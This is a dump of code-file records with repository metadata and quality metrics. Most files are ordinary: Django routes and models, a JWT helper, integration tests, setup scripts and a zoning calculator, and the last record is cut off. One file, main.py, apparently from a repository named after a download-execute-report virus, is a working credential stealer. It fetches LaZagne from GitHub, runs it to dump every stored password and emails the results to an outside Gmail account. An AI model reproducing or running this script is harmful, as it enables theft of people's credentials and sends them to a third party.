hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4c237eab0c099d5c3321cd95e513399431effe30 | 668 | py | Python | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | 4 | 2020-05-27T10:02:31.000Z | 2021-07-11T08:14:20.000Z | from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
] | 39.294118 | 117 | 0.754491 | 71 | 668 | 7.070423 | 0.408451 | 0.089641 | 0.039841 | 0.059761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08982 | 668 | 17 | 118 | 39.294118 | 0.825658 | 0 | 0 | 0 | 0 | 0 | 0.415546 | 0.31988 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c2609dfb8072ffe05951ef05454ba700de01952 | 789 | py | Python | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | [
"MIT"
] | 1 | 2020-03-02T20:55:04.000Z | 2020-03-02T20:55:04.000Z | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | [
"MIT"
] | 6 | 2020-06-05T17:18:41.000Z | 2022-03-11T23:14:47.000Z | students/models/group.py | Stanislav-Rybonka/studentsdb | efb1440db4ec640868342a5f74cd48784268781f | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from django.db import models
from django.utils.translation import ugettext as _
class Group(models.Model):
"""
Group model
"""
title = models.CharField(max_length=256, blank=False, verbose_name=_('Name'))
leader = models.OneToOneField(
'Student', verbose_name=_('Leader'), blank=True, null=True, on_delete=models.SET_NULL)
notes = models.TextField(blank=True, verbose_name=_('Additional notices'))
class Meta(object):
verbose_name = _('Group')
verbose_name_plural = _('Groups')
def __str__(self):
if self.leader:
return '{} ({} {})'.format(
self.title, self.leader.first_name, self.leader.last_name)
else:
            return '{}'.format(self.title)
| 29.222222 | 94 | 0.64512 | 91 | 789 | 5.307692 | 0.549451 | 0.113872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00491 | 0.225602 | 789 | 26 | 95 | 30.346154 | 0.785597 | 0.013942 | 0 | 0 | 0 | 0 | 0.076115 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.176471 | 0 | 0.647059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4c263e5689af5df6e8fbc9a6cee80e41efe505e2 | 2,319 | py | Python | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | [
"MIT"
] | null | null | null | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | [
"MIT"
] | null | null | null | frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | f8b2188bdf160408adf0068f2e3bd3cd4b0b4655 | [
"MIT"
] | null | null | null | from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
class IdentityClientMixin(metaclass=ABCMeta):
__publicKey = None
@property
@abstractmethod
def vendor_session_request(self) -> requests.Session:
pass
@property
@abstractmethod
def should_refresh_vendor_token(self) -> bool:
pass
@abstractmethod
def refresh_vendor_token(self) -> None:
pass
def get_public_key(self) -> str:
if self.__publicKey:
return self.__publicKey
logger.info('could not find public key locally, will fetch public key')
        retries = 0
        while retries < 10:
            try:
                self.__publicKey = self.fetch_public_key()
                return self.__publicKey
            except Exception as e:
                retries = retries + 1
                logger.error(
                    'could not get public key from frontegg, retry number - ' + str(retries) + ', ' + str(e))
logger.error('failed to get public key in all retries')
def fetch_public_key(self) -> str:
if self.should_refresh_vendor_token:
self.refresh_vendor_token()
response = self.vendor_session_request.get(
frontegg_urls.identity_service['vendor_config'])
response.raise_for_status()
data = response.json()
return data.get('publicKey')
def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True):
if not authorization_header:
raise InvalidTokenError('Authorization headers is missing')
logger.debug('found authorization header: ' +
str(authorization_header))
jwt_token = authorization_header.replace('Bearer ', '')
if verify:
public_key = self.get_public_key()
logger.debug('got public key' + str(public_key))
decoded = jwt.decode(jwt_token, public_key, algorithms='RS256')
else:
decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False)
logger.info('jwt was decoded successfully')
logger.debug('JWT value - ' + str(decoded))
return decoded
| 32.661972 | 108 | 0.639069 | 257 | 2,319 | 5.571984 | 0.354086 | 0.075419 | 0.050279 | 0.046089 | 0.103352 | 0.030726 | 0 | 0 | 0 | 0 | 0 | 0.005974 | 0.278137 | 2,319 | 70 | 109 | 33.128571 | 0.849462 | 0 | 0 | 0.175439 | 0 | 0 | 0.131522 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0.052632 | 0.122807 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c2897e16dece2ba4ecd2dbef042a4f90f011294 | 786 | py | Python | main.py | TheRavehorn/DownloadExecuteReport-Virus | 9df26706e504d1df33e07c09fa56baa28d89f435 | [
"MIT"
] | null | null | null | main.py | TheRavehorn/DownloadExecuteReport-Virus | 9df26706e504d1df33e07c09fa56baa28d89f435 | [
"MIT"
] | null | null | null | main.py | TheRavehorn/DownloadExecuteReport-Virus | 9df26706e504d1df33e07c09fa56baa28d89f435 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as f:
f.write(get_response.content)
def send_mail(email, password, message):
server = smtplib.SMTP_SSL("smtp.gmail.com", "465")
server.ehlo()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("youremail@gmail.com", "yourpassword", result)
os.remove("lazagne.exe")
| 24.5625 | 97 | 0.720102 | 110 | 786 | 5.054545 | 0.581818 | 0.053957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011782 | 0.136132 | 786 | 31 | 98 | 25.354839 | 0.807069 | 0.036896 | 0 | 0 | 0 | 0.043478 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.130435 | 0.26087 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4c31c440814ac777bd4779fa4968cf1b1847bcac | 1,263 | py | Python | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | [
"Apache-2.0"
] | 47 | 2017-12-17T00:54:33.000Z | 2022-02-25T09:54:52.000Z | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | [
"Apache-2.0"
] | 125 | 2017-10-27T09:38:10.000Z | 2022-03-10T07:53:35.000Z | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | [
"Apache-2.0"
] | 50 | 2018-01-19T07:57:21.000Z | 2022-02-14T14:47:31.000Z | import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestServiceInstances(unittest.TestCase):
def test_create_update_delete(self):
client = build_client_from_configuration()
result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters)
if len(client.update_parameters) > 0:
client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
else:
_logger.warning("update test skipped")
client.v2.service_instances.remove(result["metadata"]["guid"])
def test_get(self):
client = build_client_from_configuration()
cpt = 0
for instance in client.v2.service_instances.list():
if cpt == 0:
self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
cpt += 1
_logger.debug("test_get - %d found", cpt)
| 43.551724 | 129 | 0.69517 | 145 | 1,263 | 5.786207 | 0.351724 | 0.066746 | 0.125149 | 0.200238 | 0.299166 | 0.261025 | 0.170441 | 0 | 0 | 0 | 0 | 0.010784 | 0.192399 | 1,263 | 28 | 130 | 45.107143 | 0.811765 | 0 | 0 | 0.086957 | 0 | 0 | 0.087886 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c | 553 | py | Python | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | """Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
      description='Utility functions for working with Myo Armband data',
author='Lif3line',
author_email='adamhartwell2@gmail.com',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 27.65 | 85 | 0.631103 | 64 | 553 | 5.359375 | 0.65625 | 0.093294 | 0.110787 | 0.151604 | 0.25656 | 0.25656 | 0.25656 | 0.25656 | 0 | 0 | 0 | 0.012019 | 0.24774 | 553 | 19 | 86 | 29.105263 | 0.8125 | 0.151899 | 0 | 0 | 0 | 0 | 0.345572 | 0.049676 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c43be0918680e081f3bcc9acc58506e39754d60 | 1,421 | py | Python | setup.py | jerzydziewierz/typobs | 15fa697386f5fb3a1df53b865557c338be235d91 | [
"Apache-2.0"
] | null | null | null | setup.py | jerzydziewierz/typobs | 15fa697386f5fb3a1df53b865557c338be235d91 | [
"Apache-2.0"
] | null | null | null | setup.py | jerzydziewierz/typobs | 15fa697386f5fb3a1df53b865557c338be235d91 | [
"Apache-2.0"
] | null | null | null | # setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
packages=find_packages(),
# metadata to display on PyPI
author="Jerzy Dziewierz",
author_email="jurek_pypi@dziewierz.pl",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
) | 36.435897 | 87 | 0.640394 | 152 | 1,421 | 5.914474 | 0.625 | 0.048943 | 0.062291 | 0.124583 | 0.151279 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010899 | 0.225194 | 1,421 | 39 | 88 | 36.435897 | 0.805631 | 0.152006 | 0 | 0 | 0 | 0 | 0.584654 | 0.060884 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.030303 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940 | 776 | py | Python | tests/test_selection.py | qrebjock/fanok | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | [
"MIT"
] | null | null | null | tests/test_selection.py | qrebjock/fanok | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | [
"MIT"
] | null | null | null | tests/test_selection.py | qrebjock/fanok | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | [
"MIT"
] | 1 | 2020-08-26T12:20:26.000Z | 2020-08-26T12:20:26.000Z | import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
| 27.714286 | 79 | 0.474227 | 135 | 776 | 2.674074 | 0.325926 | 0.055402 | 0.041551 | 0.044321 | 0.368421 | 0.368421 | 0.163435 | 0.163435 | 0.127424 | 0.127424 | 0 | 0.192884 | 0.311856 | 776 | 27 | 80 | 28.740741 | 0.483146 | 0 | 0 | 0 | 0 | 0 | 0.028351 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.043478 | false | 0 | 0.130435 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c49699fa44232922a69a87e2fa00808e22b315a | 7,256 | py | Python | unitcap/unit_cap.py | fintelia/habitationi | 7dd15ecbab0ad63a70505920766de9c27294fb6e | [
"Apache-2.0"
] | 1 | 2021-10-03T14:44:38.000Z | 2021-10-03T14:44:38.000Z | unitcap/unit_cap.py | fintelia/habitationi | 7dd15ecbab0ad63a70505920766de9c27294fb6e | [
"Apache-2.0"
] | null | null | null | unitcap/unit_cap.py | fintelia/habitationi | 7dd15ecbab0ad63a70505920766de9c27294fb6e | [
"Apache-2.0"
] | 1 | 2021-02-20T23:22:10.000Z | 2021-02-20T23:22:10.000Z | #!/usr/bin/python
# Copyright 2019 Christopher Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
def get_caps(options):
far = {}
for i in ['A-1', 'A-2', 'B', 'SD-2']:
far[i] = 0.5
for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']:
far[i] = 0.6
for i in ['C-1', 'BA-3', 'IB-2', 'O-1']:
far[i] = .75
for i in ['BA-1', 'SD-12']:
far[i] = 1.0
for i in ['C-1A', 'SD-5']:
far[i] = 1.25
for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']:
far[i] = 1.5
for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']:
far[i] = 1.75
for i in ['BC', 'O-2']:
far[i] = 2.0
for i in ['C-2A']:
far[i] = 2.50
for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']:
far[i] = 3.0
for i in ['IA-2', 'IB']:
far[i] = 4.0
far['BB-1'] = 3.25
far['SD-11'] = 1.7
far['SD-15'] = 3.5
lot_area = {
'A-1': 6000,
'A-2': 4500,
'C-1A': 1000,
'BC': 500,
'BC-1': 450,
'IA-1': 700,
'SD-8': 650,
'SD-14': 800,
}
for i in ['IB-2', 'BA-1']:
lot_area[i] = 1200
for i in ['B', 'SD-2', 'SD-3']:
lot_area[i] = 2500
for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']:
lot_area[i] = 1800
for i in ['C-1', 'BA-3']:
lot_area[i] = 1500
for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']:
lot_area[i] = 600
for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']:
lot_area[i] = 300
for i in lot_area:
if options and 'lot_explicit' in options:
lot_area[i] = options['lot_explicit']
elif options and 'lot_factor' in options:
lot_area[i] = int(lot_area[i] / float(options['lot_factor']))
if 'no_lot' in options:
lot_area = {}
for i in far:
if options and 'far_explicit' in options:
far[i] = options['far_explicit']
elif options and 'far_factor' in options:
far[i] = far[i] * float(options['far_factor'])
if 'no_far' in options:
far = {}
return far, lot_area
def table(options):
far, lot_area = get_caps(options)
table = []
for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']:
table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,"")))
return "\n".join(table)
def unit_cap(row, options=None):
if not options:
options = {}
far, lot_area = get_caps(options)
zone = row['zone']
if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD":
return -1
if zone in ['A-1', 'A-2'] and not 'no_a' in options:
return 1
#print row
area = float(row.get('gis_lot_size',0) or 0)
if zone in lot_area and area:
m = max(area/(lot_area[zone]), 1)
else:
m = 100000
max_building = area * far[zone] * 1
if max(int(max_building/800), 1) < m:
m = max(int(max_building/800), 1)
if zone == "B" and not 'no_b' in options:
m = min(m, 2)
return m
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def compute_count(options = None):
conn = sqlite3.connect("prop.db")
if options == None:
options = {}
c = conn.cursor()
c.row_factory = dict_factory
m = 0
current = 0
for row in c.execute("SELECT * FROM lots"):
t = unit_cap(row, options=options)
if t == -1:
continue
m += int(t)
return m
def describe(options):
changes = []
if 'no_lot' in options:
changes.append("eliminate lot size/unit minimums")
elif 'lot_explicit' in options:
changes.append("set all lot size/unit minimums to %s" % options['lot_explicit'])
elif 'lot_factor' in options and options['lot_factor'] != 1.0:
changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor'])
if 'no_a' in options:
changes.append('eliminate single family zoning in A-1 and A-2 zones')
if 'no_b' in options:
changes.append('eliminate two-family zoning limits in B zones')
if 'far_explicit' in options:
changes.append("set all FAR maximums to %s" % options['far_explicit'])
elif 'far_factor' in options and options['far_factor'] != 1.0:
changes.append('increase FAR maximums by a factor of %s' % options['far_factor'])
if len(changes):
return ", ".join(changes)
else:
return ""
def serve(options):
d = open("unit_template.html")
template = Template( d.read() )
unit_count = int(compute_count(options))
data = {}
data['changes'] = describe(options)
data['unit_count'] = unit_count
data['increase'] = unit_count-37453
data['table'] = table(options)
data['options'] = options
s = template.render(**data)
return s
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# Send the html message
form = parse_qs(urlparse(self.path).query)
options = {}
for i in ['far_factor', 'lot_factor']:
if i in form:
options[i] = float(form[i][0])
else:
options[i] = 1.0
if 'far_explicit' in form and form['far_explicit']:
options['far_explicit'] = float(form['far_explicit'][0])
if 'lot_explicit' in form and form['lot_explicit']:
options['lot_explicit'] = int(form['lot_explicit'][0])
if 'lot' in form:
options['no_lot'] = True
if 'singlefamily' in form:
options['no_a'] = True
if 'twofamily' in form:
options['no_b'] = True
self.wfile.write(serve(options))
return
def run():
try:
        # Create a web server and define the handler to manage
        # incoming requests
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
        # Wait forever for incoming HTTP requests
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
if __name__ == "__main__":
print run()
| 32.106195 | 108 | 0.553335 | 1,106 | 7,256 | 3.545208 | 0.230561 | 0.016832 | 0.032135 | 0.017853 | 0.185157 | 0.093344 | 0.057128 | 0.011732 | 0 | 0 | 0 | 0.045787 | 0.283627 | 7,256 | 225 | 109 | 32.248889 | 0.708542 | 0.098953 | 0 | 0.077348 | 0 | 0.005525 | 0.194355 | 0.006443 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027624 | null | null | 0.016575 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c4be3eb705a80e6147920908a86da5673e90f59 | 918 | py | Python | week4/string_format.py | MathAdventurer/Data_Mining | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | [
"MIT"
] | 1 | 2021-02-27T18:35:39.000Z | 2021-02-27T18:35:39.000Z | week4/string_format.py | MathAdventurer/Data_Mining | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | [
"MIT"
] | null | null | null | week4/string_format.py | MathAdventurer/Data_Mining | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
